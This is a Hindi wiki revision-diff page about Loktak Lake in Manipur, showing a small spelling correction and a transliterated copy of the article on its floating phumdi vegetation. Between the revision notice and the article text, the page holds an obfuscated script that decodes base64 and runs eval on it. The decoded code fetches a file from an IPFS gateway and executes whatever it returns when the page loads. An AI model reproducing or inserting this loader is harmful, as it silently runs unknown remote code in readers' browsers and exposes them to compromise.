Difference between revisions of "लोकटक झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 6: Line 6:
 
*इस झील में घनी जलीय घास के बड़े-बड़े हिस्से तैरते रहते हैं जिन्हें फुमडी के नाम से जाना जाता है।  
 
*इस झील में घनी जलीय घास के बड़े-बड़े हिस्से तैरते रहते हैं जिन्हें फुमडी के नाम से जाना जाता है।  
 
*इन तैरती वनस्पतियों के कारण लोकटक झील को तैरती झील कहा जाता है।  
 
*इन तैरती वनस्पतियों के कारण लोकटक झील को तैरती झील कहा जाता है।  
*जलीय घास के ये हिस्से इतने बड़ॆ होते है कि झील में बसने वाले मछुआरे उसमें अपनी झोपड़ी बना कर रहते हैं।<ref>{{cite web |url=http://travelwithmanish.blogspot.com/2010_06_01_archive.html |title=मणिपुर की लोकटक झील, गोल घेरों वाली तैरती फुमडियाँ और संगाई हिरण |accessmonthday=[[31 अगस्त]] |accessyear=2011 |last= |first= |authorlink= |format=|publisher=मुसाफ़िर हूँ यारों |language=[[हिन्दी]] }}</ref>
+
*जलीय घास के ये हिस्से इतने बड़े होते है कि झील में बसने वाले मछुआरे उसमें अपनी झोपड़ी बना कर रहते हैं।<ref>{{cite web |url=http://travelwithmanish.blogspot.com/2010_06_01_archive.html |title=मणिपुर की लोकटक झील, गोल घेरों वाली तैरती फुमडियाँ और संगाई हिरण |accessmonthday=[[31 अगस्त]] |accessyear=2011 |last= |first= |authorlink= |format=|publisher=मुसाफ़िर हूँ यारों |language=[[हिन्दी]] }}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 12:48, 31 August 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

lokatak jhil|thumb|250px

  • lokatak jhil bharat ke uttarapoorv ki sabase b di mithe pani ki jhil hai. yah jhil manipur mean khooga nadi ke pas sthit hai.
  • lokatak jhil dekhane mean bahut khoobasoorat hai.
  • lokatak jhil vishv mean tairati jhil ke nam se vikhyat hai.
  • is jhil mean ghani jaliy ghas ke b de-b de hisse tairate rahate haian jinhean phumadi ke nam se jana jata hai.
  • in tairati vanaspatiyoan ke karan lokatak jhil ko tairati jhil kaha jata hai.
  • jaliy ghas ke ye hisse itane b de hote hai ki jhil mean basane vale machhuare usamean apani jhop di bana kar rahate haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh